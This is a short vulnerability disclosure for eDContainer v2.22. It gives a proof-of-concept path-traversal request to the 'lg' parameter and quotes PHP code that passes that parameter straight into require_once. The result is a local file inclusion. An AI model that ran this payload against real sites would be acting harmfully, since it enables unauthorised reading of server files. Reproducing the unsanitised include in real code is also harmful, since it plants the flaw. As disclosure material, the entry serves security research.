id: 4559
date: 12/29/2008
title: eDContainer v2.22 (lg) Local File Inclusion Vulnerability
author: GoLd_M
cves: 

=========================================================
eDContainer v2.22 (lg) Local File Inclusion Vulnerability
=========================================================


eDContainer v2.22 (lg) Local File Inclusion Vulnerability
Script : http://www.mirrorservice.org/sites/download.sourceforge.net/pub/sourceforge/e/ed/edscontacts/eDContainer_v222.zip
Poc : /index.php?lg=../../../../index
Vuln Code :
File index.php

if ( isset($_REQUEST['lg']) ) { $INDEX['currentLanguage'] = $_REQUEST['lg']; } else if ( !isset( $INDEX['currentLanguage'] ) ) { 
 	$INDEX['currentLanguage']  = $CONFIG['language']['default'];
}
require_once 'myContents_'.$INDEX['currentLanguage'].'.php';



#  0day.today [2023-03-23]  #